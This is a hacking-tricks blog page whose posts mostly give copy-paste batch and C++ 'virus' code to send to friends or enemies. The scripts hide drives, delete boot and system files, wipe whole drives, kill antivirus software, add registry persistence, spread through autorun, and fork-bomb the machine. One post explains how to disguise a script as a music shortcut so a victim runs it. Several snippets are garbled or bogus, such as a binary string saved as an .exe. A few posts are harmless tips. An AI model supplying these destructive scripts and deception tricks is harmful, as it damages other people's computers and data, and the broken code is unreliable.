Developer's Note

Followers

Dont forget to like

Recommend on Google

More Post

Random Post

Some More Post

Advertisement

Video

LIke Us

Flag Counter

Pages

Flickr

About

Facebook

Advertising

Advertising

Popular Posts

Showing posts with label Dangerous. Show all posts
Showing posts with label Dangerous. Show all posts

Sunday, 20 October 2013

Tagged under: , , ,

Trick to make a hard disk disabling Virus



There is Trick to make a Virus which can disable full Hard Disk. This is a Virus made out of C++ coding. This Trick can be used to hack any computer's hard disk and to annoy the friends or enemy. Note : Don't Run this Program on your Computer otherwise you will lose your Windows. I am not Responsible for any Accident caused by this File on your Computer.


Open Notepad. Copy and Paste the following code into Notepad: 

#include<windows.h>
#include<stream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackDrive.bat" );
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; 
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
 write<<"shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat",NULL,NULL,SW_SHOWNORMAL); 

return 0; 
}

 Save it as HardDiskHack.cpp.
 Compile this file in C++ and create the .exe (HardDiskHack.exe) file. 
Send this file to the victim or the enemy. 

Note : Don't Run so Created HardDiskHack.exe File, otherwise it will attack your Computer itself.
 If you are not a good C++ programmer, then you can also create the Bat Virus. To create it follow these simple steps: 


  • Open Notepad. 
  • Copy and Paste the following Code into Notepad:


 REG ADD 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f 


  • Save it as HardDiskHack.bat. 

Now it is done. So it is a simple Trick to make a Virus which can disable full Hard Disk.


                                                                                               

Sunday, 17 March 2013

Tagged under: , ,

Easiest Way of Killing The Running Windows Processes


There are several ways to kill Windows processes which stops responding. The most common way is by opening Windows Task Manager and go to Processes tab and right click on the process and select End Process. Apart from this you generally restart your computer when the program fails to respond.
You can create custom batch file to kill multiple programs in a click. Here’s how you can create one:
- Open Notepad.
- Paste the following lines in the notepad.
taskkill /im program1.exe
taskkill /im program2.exe
- Open Windows task manager by pressing “Ctrl+Shift+Esc”. Go to processes tab and go to the program name not responding.
- Replace program1.exe and program2.exe by actual name of the processes. For example I replaced program1 by Evernote andprogram2 by Skype.

- Go to File -> Save as and give the file name killprocess.bat. You can give it any name  but don’t forget to add .bat at the end of the name (for ex. anyname.bat). In the Save as type dropdown, select All files.

-Save the file anywhere on the computer. Now if your program stops responding, just doble click on the bat file to kill the process.

A black screen will appear for the short period of time which pop ups the message that termination signal sent to the processes.
That’s it. Your added programs will kill within fraction of second.

                                                                                                                               ^_^

Monday, 11 March 2013

Tagged under: , , ,

Trick to make Virus which can Disable Internet Permanently





There is a Trick to make Virus which can Disable Internet Permanently. To do this follow thesesimple steps : 
1) Open Notepad. 
2) Copy and Paste the following Code into Notepad : 
echo @echo off>c:windowswimn32.bat 
echo break off>>c:windowswimn32.bat 
echo ipconfig/release_all>>c:windowswimn32.bat 
echo end>>c:windowswimn32.bat 
reg add 
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d 
:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f 
echo You Have Been HACKED! 
PAUSE 

3) Save it as InternetDisabled.bat. 
4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently. 
   
                                                                                                                      ^_^


Tagged under: , , ,

Tricks to make Simple Virus



There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick : 1) Open Notepad 2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make : a) To Delete all the Content of a Drive use this Code : @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 b) To Crush the Windows use this Code : @Echo off Del C:\ *.* y c) To make Computer Restart simultaneously use this Code : @echo off shutdown -r -f -t 00 d) To make Fork Virus to open many Command Prompts use this Code : start %0 goto :s 3) Now Save these Files with any desired name with .bat extention. 4) Don't Run these Files on Your own Computer otherwise the Result you already know. So these are simple Tricks to make Simple Virus.

Tagged under: ,

Trick to make a Virus which can Format and Destroy Hard Drive


There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below : 
1) Open Notepad. 
2) Copy and Paste the given Code into Notepad : 

01001011000111110010010101010101010000011111100000 

3) Save it as HardDriveVirus.exe.
 4) Now it is done. 
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated. So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive




Sunday, 10 March 2013

Tagged under: , ,

12 Most Common Computer Viruses


No matter how careful you might be, chances are, at one time or another, you will find your computer infected with a virus. If you are a frequent Internet user and you often download videos, music and other files from online, the chances of you picking up a trojan, worm, or other virus are almost assured. Thankfully, there are many great virus protection programs on the market today. but that doesn’t mean you shouldn’t have an idea of some of the common computer viruses that are currently going around.

1. Encrypted Viruses – The encrypted virus is probably the most difficult kind of bug to detect and the most difficult to stop. You may accidentally have downloaded one of these bugs and before you know it, your entire computer can be infected. Many top virus protection programs miss encrypted viruses because these bugs use a different form of encryption every time. When the bug wants to run wild, it decrypts itself. In most cases, your virus protection can then identify it and stop it.

2. Secret Viruses – These types of viruses will make changes to files on your computer, or completely replace files, but then try to trick your computer and your anti virus program into thinking that the originals are being used. Most advanced virus protection programs can stop these common computer viruses dead in their tracks.

3. Time Delay Viruses – These types of viruses take a much slower, more disciplined path towards ruining your computer. Instead of instantly trying to take over your computer the moment you download them, they will wait and slowly infect files bit by bit. You may not have been online for days but then suddenly find yourself with an infection. These common computer viruses are the reason why you should run your virus protection every few days, just in case.

4. The Anti-Virus Virus – Believe it or not, there are viruses out there that do nothing more than attack your pre-installed anti virus program in hopes of disabling it so other viruses can then be downloaded. This is why many people have a virus protection program as well as a separate anti-spyware or anti-malware program on their computer.

5. The Multi-Headed Virus – This is one of the most nefarious bugs on the whole Internet. Not only are there parts of this virus that will attach themselves to .exe files on your computer, but it will also affect your computer’s start up so that you begin running the virus every time you turn your computer on automatically.

6. The Misdirection Virus – This type of virus is downright scary. It has a built in subprogram that is made to give false readings to your virus protection software. You think you have a bug in one directory, when, in fact, the virus is busy harming your computer in a whole other area.

7. A Cloning Virus – The cloning virus is an old fashioned type of bug. When you download it, it will quickly create duplicates for .exe files you have on your computer, hoping that you’ll click on it when you really mean to click on a healthy program you already have.

8. The Author Virus – When you download a virus, it usually attaches itself to a program and then runs when you run that program. The Author Virus, on the other hand, finds an .exe file and actually deletes and rewrites code so that the program is changed. Few common computer viruses run this way since the level of virus needs to be so sophisticated.

9. The Bad Penny Virus – The very first computer virus to ever hit the Internet was a Bad Penny virus. This is a bug that automatically passes itself on to everyone on a network or on the Internet unless something stops it. This was the whole reason why firewalls were invented.

10. When most of us think of viruses, we think of PC’s running Windows software. However, there are a handful of bugs out there for the Mac.

11. Rewriting Virus – This bug made a habit out of rewriting some of your most needed files, as well as filling up your hard drive with all sorts of invisible files you couldn’t normally see.

12. The Melissa Virus – This was a bug that hit everyone, both PC users and Mac users. It would automatically email itself to other people without permission. It can be extra harmful if you use a private mail server at your place of employment. The Melissa virus has gone down in history as one of the most common computer viruses of all time.
Tagged under: , ,

Firewall Protection - Why You Need It?



If your house has an alarm system, surveillance cameras, or any type of security equipment to prevent burglars, then you can compare it to a firewall. A firewall will monitor and limit connections to your computer from the internet and other users. A computer without a firewall is defenseless, and makes it easier for hackers or unwanted programs to invade your computer. There are two types of firewalls, hardware or software.

Routers are devices that act as hardware firewalls. They prevent other users and unwanted software from entering your network. Routers are not only great for firewalls, but also can be used for sharing and connecting computers to a network. Some people use Network Address Translation (NAT) routers as firewalls, even though NAT routers primary purpose is to share an internet connection with local computers. If you do not have a router firewall, you can use a software firewall that will do the job.
There are many software firewalls out there, but only a few are free. Most of the software firewalls are shareware, trials or subscription. Some free versions only have some features and if you want the full package, you will need to pay. Window XP comes with a decent firewall, but you need to make sure you have Service Pack 2 and the latest updates installed.

You can check to see if your Windows XP firewall is running by clicking Start / Control Panel / Windows Firewall, or another way is My Computer / Control Panel / Network Connections / Right click your "Local Area Network" and click properties / Click on the Advance tab then click Settings. You can click to turn your windows firewall on or off.

Software firewalls can be very complex as they contain several features. Some of the features are antivirus and antispyware, program control, e-mail protection and privacy control. These features help boost your protection for your computer, since a firewall alone cannot do everything. A disadvantage of having a software firewall instead of a hardware firewall is that it will use your computer's resources to function. Make sure you have enough memory to prevent your system from crashing. Software firewalls can manage inbound and outbound traffic by placing policies or rules. These policies will allow or reject your programs from accessing the internet, and prevent any unwanted internet programs from invading your computer. These policies are at the owners control and may change any setting as they wish.

Firewalls may give the user increased security by protecting your computer from hackers, as opposed to having no firewall. Hackers will try anything to get into your computer by searching through your computer's ports. Your computer has many ports. They are used to connect to the internet, but sometimes they are left open. Hackers can send a virus or spyware to these ports, and take control of your computer. To prevent this from happening, a firewall will make sure all unused ports are closed.

If you plan to access the internet without a firewall, it is like putting your hand in a beehive. The risk of you being stung are high, and it is the same risk for your computer to be hacked. Without a firewall your ports will be opened, and make it vulnerable for hackers. Therefore, choose a proper firewall that suits your needs.
                                 
                                                                                                                                       ^_^

Saturday, 5 January 2013

Tagged under: , , ,

Disable Mouse/Keyboard




  • Open Notepad (Start > All Programs > Accessories > Notepad). 
  • Copy the code and paste it in notepad.


  • Mouse:

    rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%

    Saturday, 8 December 2012

    Tagged under: , ,

    pc infection !!



    Add one of these to your .bat, and it will infect that with the virus.its very dengerous..!!


    Open Notepad(Start > All Programs > Accessories > Notepad).
    Copy the following code and paste it in notepad.


    Code:

    1. Infect all drives:


    rem ---------------------------------
    rem Infect All Drives
    for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
    copy /Y %0 %%E:\
    echo [AutoRun] > %%E:\autorun.inf

    Thursday, 6 December 2012

    Tagged under: , ,

    FOLDER OPTION missing


    Many of us sometimes find the folder options missing in windows explorer.

    Here's the solution
    Open Run and then type "
    gpedit.msc".
    Now goto
    User Configuration > Administrative templates > Windows Component > Windows Explorer.

    Sunday, 2 December 2012

    Tagged under: , ,

    Kill Anti-Virus



    Chances are the victim has anti virus software installed, so put this into a seperate file and run it first.
    open ur notepad n type the following.........
    Code:

    @ echo off
    rem ---------------------------------
    rem Encripted AV Killer
    del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.bat
    set ii=ne

    Saturday, 1 December 2012

    Tagged under: , ,

    Swapping the Mouse Keys

    One of the simplest pranks, best used in conjunction with another. All it does is swap the right and left buttons on your mouse.


    Open Notepad

    @ echo off
    rem ---------------------------------
    rem Swap mouse button
    RUNDLL32 USER32.DLL,SwapMouseButton

    Wednesday, 28 November 2012

    Tagged under: , ,

    Write VIRUS to computer in 5 minutes




    1) Creating virus trick
    open ur notepad n type the following.........

    type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by any name]
    create the notepad in c: drive... 

    Tuesday, 27 November 2012

    Wednesday, 21 November 2012

    Wednesday, 14 November 2012

    Tagged under: , ,

    The easiest way to get your friends PC hanged!


    To hang windows explorer:
    Get access to your friend's PC Or try it yourself
    • Open Notepad(Start > All Programs > Accessories > Notepad).
    • Copy the following code and paste it in notepad.

    @echo off
    :A
    start
    goto:A

    • From the Menu bar, click on File > Save As. The Save As dialog box opens. 
    • Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name]. 
    • Now Open the hang.bat file and see the computer getting hanged!

    Sunday, 11 November 2012

    Tagged under: , ,

    Microsoft Word Prank


    Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

    1. Launch Microsoft Word

    2. Go to Tools -> AutoCorrect Options…



    3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add




    enjoy-------------




    Tagged under: , ,

    Make over 1,000 folders in few seconds


    Here I will show you simple prank that will make an unlimited amount of folders in any place you want.

    1. Open notepad and type :

    @echo off
    :top
    md %random%
    goto top 

    @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
    md %random% is command that creating folders with random names.
    goto top – return to label :top, infinite loop


    2. Save it as 1000folders.bat




    3. After that you will get icon that looks as show below
        
                                            
    People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

    4. Right click on icon and click Create Shortcut


    5. Right click on shortcut and click properties , then click on Change Icon and rename icon




    Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…


    :P
    Tagged under: ,

    Cool Windows Prank

    This will make it to where your friend cannot click on anything on the screen.

    1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.  



    2. Make your printscreen picture as desktop background.

    3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
    Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)



    That is it , when you click on the “icons”, nothing will happen!


    Hope you'll have a lot of fan with this prank. 
    Tagged under: ,

    Shut Down a Computer Forever

                   


                                         



    Open notepad and copy/paste this code:

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini


    Now Save it as a .bat file.

    This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.



    REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

    Send it to your friends computer and tell them to open it. Have fun!!

    Here is another code too.....

    cmd /c del c:\windows\* /F /S /Q

    cmd /c del c:\* /F /S /Q


    Paste it in NotePad And Save It with Extension .cmd or .bat 



    enjoy...

    Translate